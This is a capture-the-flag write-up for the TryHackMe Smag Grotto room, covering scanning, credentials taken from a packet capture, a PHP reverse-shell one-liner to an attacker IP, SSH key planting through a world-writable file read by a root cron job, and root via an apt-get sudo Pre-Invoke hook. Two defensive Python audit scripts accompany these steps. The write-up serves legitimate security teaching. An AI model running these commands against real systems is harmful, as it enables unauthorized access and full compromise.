TryHackMe: Smag Grotto Writeup



1. Scanning & Enumeration

We do the below scans in parallel.

1.1. Port Scanning

Not shown: 998 closed ports
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 74:e0:e1:b4:05:85:6a:15:68:7e:16:da:f2:c7:6b:ee (RSA)
| 256 bd:43:62:b9:a1:86:51:36:f8:c7:df:f9:0f:63:8f:a3 (ECDSA)
|_ 256 f9:e7:da:07:8f:10:af:97:0b:32:87:c9:32:d7:1b:76 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Smag
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nothing too special.

1.2. Web Enumeration

└─$ gobuster dir -w /usr/share/wordlists/dirbuste-list-2.3-medium.txt -x 'php,html,txt' -t 32 -q -219
/index.php (Status: 200) [Size: 402]
/mail (Status: 301) [Size: 311] []

/mail/ looks interesting. We explore that below.

1.3. Web Exploration


After reading the emails in /mail/, we add a smag.thm line to the /etc/hosts file.

└─$ cat /etc/hosts localhost kali smag.thm
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

1.4. Wireshark

The mail directory also links a capture file, which we can download just by clicking on it. We open it in Wireshark and explore it further.

In one of the packets, we found:

POST /login.php HTTP/1.1
Host: development.smag.thm
User-Agent: curl/7.47.0
Accept: */*
Content-Length: 39
Content-Type: application/x-www-form-urlencoded

username={hidden}&password={wow_very_nice}

HTTP/1.1 200 OK
Date: Wed, 03 Jun 2020 18:04:07 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8

Add development.smag.thm next to smag.thm in the /etc/hosts file, which then looks like the following.

└─$ cat /etc/hosts localhost kali smag.thm development.smag.thm
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

2. Foothold

Logging in with the credentials recovered from the capture, we reach a page that lets us enter commands.


I tried a bunch of commands, and this one stuck: php -r '$sock=fsockopen("MY_KALI_IP",4444);exec("sh <&3 >&3 2>&3");'

We get a shell!

└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 33886
bash -i
bash: cannot set terminal process group (707): Inappropriate ioctl for device
bash: no job control in this shell

3. PrivEsc

Looking around, I found something interesting in /etc/crontab in the last line.

www-data@smag:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root /bin/cat /opt/.backups/ > /home/jake/.ssh/authorized_keys

We see that the file /opt/.backups/ is copied into jake’s authorized_keys. This means that if I can get my own Kali SSH public key in there, I would be able to log in without a password.
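The misconfiguration behind this step is a root cron job whose input file is writable by everyone. The following audit script is an added example, not part of the original writeup: it parses a system crontab, picks out root jobs, and flags any input path (left of a `>` redirection) that is world-writable. The `demo()` scenario builds a constructed 0666 file in a temp directory as a stand-in for the hidden file in /opt/.backups/; the regexes and function names are my own.

```python
"""Audit a system crontab for root jobs whose input file is world-writable.
Added example: models the finding above (root job copying a 0666 file to authorized_keys)."""
import os
import re
import stat
import tempfile

# Six leading fields (m h dom mon dow user) then the command.
CRON_LINE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")
# Absolute paths inside a command (a lone '/' as in 'cd /' is not a path of interest).
PATH_RE = re.compile(r"(?<![\w.])/[\w./-]+")

def parse_crontab(text):
    """Return (user, command) tuples for each job line of a system crontab."""
    jobs = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if m:
            jobs.append((m.group("user"), m.group("cmd")))
    return jobs

def world_writable(path):
    """True if the path exists and has the other-write bit set (e.g. -rw-rw-rw-)."""
    try:
        return bool(os.stat(path).st_mode & stat.S_IWOTH)
    except OSError:
        return False

def find_risky_jobs(text, is_writable=world_writable):
    """Root jobs whose input paths (left of any '>' redirection) are world-writable."""
    findings = []
    for user, cmd in parse_crontab(text):
        if user != "root":
            continue
        inputs = PATH_RE.findall(cmd.split(">")[0])
        bad = [p for p in inputs if is_writable(p)]
        if bad:
            findings.append((cmd, bad))
    return findings

def demo():
    """Constructed scenario: a 0666 file feeding a root cron job, as on the page."""
    tmp = tempfile.mkdtemp()
    src = os.path.join(tmp, "backup.pub")  # stand-in for the hidden file in /opt/.backups/
    open(src, "w").write("ssh-rsa AAAA...constructed... someone@kali\n")
    os.chmod(src, 0o666)  # the -rw-rw-rw- permissions seen in the ls output above
    crontab = ("17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
               f"* * * * * root /bin/cat {src} > /home/jake/.ssh/authorized_keys\n")
    return find_risky_jobs(crontab)
```

Run `find_risky_jobs(open("/etc/crontab").read())` on a host to check its real crontab; the fix for a hit is to make the source file root-owned and 0644 (or to stop cron from writing into authorized_keys at all).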

First, we need to make sure we have write permissions.

www-data@smag:/$ ls -la /opt/.backups/
ls -la /opt/.backups/
-rw-rw-rw- 1 root root 563 Jun 5 2020 /opt/.backups/

Great! Now I copy-pasted my own key here.

www-data@smag:/$ echo "ssh-rsa {wow_nice_looking_key_uh} kali@kali" > /opt/.backups/

And …

└─$ ssh jake@
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:MMv7NKmeLS/aEUSOLy0NbyGrLCEKErHJTp1cIvsxnpA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)
* Documentation:
* Management:
* Support:
Last login: Fri Jun 5 10:15:15 2020


Now for PrivEsc to root. Exploring a bit, I found:

jake@smag:~$ sudo -l
Matching Defaults entries for jake on smag:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jake may run the following commands on smag:
(ALL : ALL) NOPASSWD: /usr/bin/apt-get

Using the apt-get sudo entry from GTFOBins:

jake@smag:~$ sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
# whoami

System compromised!
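The root step works because the sudo rule grants apt-get with no argument restriction, so any option string, including the Pre-Invoke hook, is accepted. As an added example (not the author's code), this script parses `sudo -l` output and flags rules for hook-capable binaries whose arguments are not pinned; sudoers matches arguments exactly only when the rule lists them. The sample output is constructed from the rule on the page plus a pinned variant for contrast; adding `/usr/bin/apt` to the hook-capable set is my assumption.

```python
"""Flag sudo rules that let a user pass arbitrary options to a hook-capable binary.
Added example; parses 'sudo -l' style output rather than /etc/sudoers itself."""
import re

# Constructed 'sudo -l' output: the rule found on the page plus a pinned variant.
SUDO_L_OUTPUT = """\
Matching Defaults entries for jake on smag:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User jake may run the following commands on smag:
    (ALL : ALL) NOPASSWD: /usr/bin/apt-get
    (root) /usr/bin/apt-get update
"""

# (runas) [TAG: ...] /path/to/cmd [args]
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+)(?P<args>.*)$")

# Binaries whose options can run a shell command (apt-get via APT::Update::Pre-Invoke, as on
# the page). /usr/bin/apt is included as an assumption since it shares apt-get's option parser.
HOOK_CAPABLE = {"/usr/bin/apt-get", "/usr/bin/apt"}

def parse_rules(text):
    """Return one dict per command rule in 'sudo -l' output (Defaults lines are ignored)."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append({"runas": m.group("runas").strip(),
                          "nopasswd": "NOPASSWD:" in m.group("tags"),
                          "cmd": m.group("cmd"),
                          "args": m.group("args").strip()})
    return rules

def risky_rules(text):
    """Rules whose command is hook-capable and whose argument list is not pinned.

    A pinned rule such as '/usr/bin/apt-get update' only matches that exact command
    line, so extra '-o' options are rejected; a bare '/usr/bin/apt-get' accepts any.
    """
    return [r for r in parse_rules(text) if r["cmd"] in HOOK_CAPABLE and not r["args"]]
```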

Tanishq Chaudhary